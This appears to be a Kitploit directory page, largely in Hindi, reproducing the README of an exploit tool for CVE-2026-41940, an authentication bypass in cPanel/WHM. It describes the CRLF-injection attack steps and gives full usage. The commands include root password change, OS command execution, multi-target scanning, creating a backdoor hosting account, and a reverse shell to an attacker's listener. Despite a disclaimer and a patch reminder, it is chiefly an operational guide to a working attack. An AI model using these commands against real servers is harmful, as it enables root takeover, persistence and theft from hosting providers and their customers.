Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/christian93111/cve-2026-41940
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरणलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHubchristian93111/cve-2026-41940

CVE-2026-41940

cPanel/WHM प्रमाणीकरण बाईपास (ज़ीरो-डे भेद्यता)

10294 महीने पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41940: cPanel/WHM प्रमाणीकरण बाईपास (एकल और बहु-लक्ष्य)

अस्वीकरण: यह दस्तावेज़ और संबद्ध स्क्रिप्ट (exploit.py) केवल शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान और अधिकृत पैठ परीक्षण के लिए प्रदान किए गए हैं। इस सॉफ़्टवेयर का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।

अवलोकन

exploit.py एक स्क्रिप्ट है जो cPanel और WHM में प्रमाणीकरण बाईपास भेद्यता (CVE-2026-41940) को प्रदर्शित करती है। यह भेद्यता एक अप्रमाणित हमलावर को CRLF इंजेक्शन दोष के माध्यम से डेमॉन कैश में रूट सत्र इंजेक्ट करने की अनुमति देती है, अंततः वैध क्रेडेंशियल्स की आवश्यकता के बिना रूट-स्तरीय WHM पहुँच प्रदान करती है।

भेद्यता विश्लेषण और एक्सप्लॉइट प्रवाह

एक्सप्लॉइट बेसिक ऑथेंटिकेशन हैंडलिंग तंत्र में CRLF (कैरिज रिटर्न लाइन फीड) इंजेक्शन भेद्यता का लाभ उठाता है, जो सत्र प्रसार दोष के साथ संयुक्त है। स्क्रिप्ट हमले को चार चरणों में स्वचालित करती है:

  1. पूर्व-प्रमाणीकरण सत्र मिंटिंग: एक आधार रेखा अप्रमाणित सत्र कुकी (whostmgrsession) प्राप्त करने के लिए सार्वजनिक लॉगिन एंडपॉइंट्स (जैसे, /login/ या /cgi/login.cgi) से जुड़ता है।
  2. CRLF इंजेक्शन: एक क्राफ्टेड बेसिक ऑथेंटिकेशन हेडर भेजता है जिसमें Base64-एन्कोडेड पेलोड होता है जो रूट सत्र फ़ील्ड्स को सीधे cpsrvd सत्र कैश में इंजेक्ट करता है। सर्वर का रीडायरेक्ट प्रतिक्रिया उत्पन्न सुरक्षा टोकन (cpsess) को लीक करता है।
  3. सत्र प्रसार: कच्ची सत्र कुकी को एक प्रमाणित WHM एंडपॉइंट पर भेजा जाता है, जो do_token_denied को ट्रिगर करके जाली सत्र को डेमॉन कैश में प्रसारित करता है — इसे एक वैध प्रमाणित सत्र बनाता है।
  4. सत्यापन: जाली सत्र का उपयोग करके प्रतिबंधित WHM API एंडपॉइंट्स (जैसे, /json-api/version) तक पहुँचता है ताकि रूट-स्तरीय पहुँच की पुष्टि हो सके।

आवश्यक शर्तें

  • Python 3.x
  • requests लाइब्रेरी
pip install requests

उपयोग

python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

तर्क

लक्ष्य चयन

तर्कविवरण
--target URLएकल WHM URL (जैसे, https://target:2087)
--target-file FILEलक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक ip:port) — स्वचालित रूप से जाँच मोड सक्षम करता है

नेटवर्क और मुख्य विकल्प

तर्कविवरण
--threads Nबहु-लक्ष्य मोड के लिए समवर्ती थ्रेड (डिफ़ॉल्ट: 10)
--hostname HOSTHost हेडर ओवरराइड करें — जब स्वतः-खोज विफल हो या गलत होस्टनाम दे तो उपयोग करें
--timeout Nप्रति-अनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 15)
--retries Nनेटवर्क त्रुटियों पर पुनः प्रयास संख्या (डिफ़ॉल्ट: 3)
--cookie-name NAMEविशिष्ट सत्र कुकी नाम बलपूर्वक सेट करें (छोड़ने पर स्वतः पता लगाया जाता है)
--no-verifyचरण 4 सत्यापन छोड़ें और वैसे भी आगे बढ़ें

शोषण विकल्प (बाईपास के बाद)

तर्कविवरण
--checkकेवल जाँच मोड — शोषण के बिना भेद्यता सत्यापित करें (--target-file के साथ स्वतः सेट)
--password PASSरूट पासवर्ड को PASS में बदलें
--api FUNCएक विशिष्ट WHM JSON-API फ़ंक्शन कॉल करें
--api-params K=V,...--api के लिए अल्पविराम-पृथक पैरामीटर
--exec CMDWHM scripts/run_script के माध्यम से OS कमांड निष्पादित करें (गिरावट: rawexec)
--sessionएक रूट वन-क्लिक लॉगिन URL उत्पन्न करें — तुरंत खोलें, टोकन तेजी से समाप्त होता है
--shellएक इंटरैक्टिव WHM शेल में प्रवेश करें (केवल एकल लक्ष्य)
--dumpसर्वर जानकारी डंप करें: संस्करण, खाते, DNS ज़ोन, विशेषाधिकार
--add-user USER PASS DOMAINएक नया cPanel होस्टिंग खाता बनाएँ
--revshell LHOST LPORTअपने श्रोता को एक bash रिवर्स शेल भेजें

आउटपुट विकल्प

तर्कविवरण
--output FILEसत्र टोकन और विवरण को JSON फ़ाइल में सहेजें

उदाहरण

# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

इंटरैक्टिव शेल कमांड

--shell का उपयोग करते समय, निम्नलिखित कमांड उपलब्ध हैं:

कमांडविवरण
api <function> [k=v ...]WHM JSON-API फ़ंक्शन कॉल करें (जैसे, api version)
exec <command>WHM के माध्यम से OS कमांड चलाएँ (जैसे, exec id)
passwd <newpass>रूट पासवर्ड बदलें
dumpसर्वर जानकारी डंप करें
revshell <lhost> <lport>रिवर्स शेल भेजें
add <user> <pass> <domain>cPanel खाता बनाएँ
save <path>वर्तमान सत्र को फ़ाइल में सहेजें
exit / quitशेल से बाहर निकलें

याद दिलाना

नवीनतम cPanel/WHM सुरक्षा पैच तुरंत लागू करें।

टूल डाउनलोड करें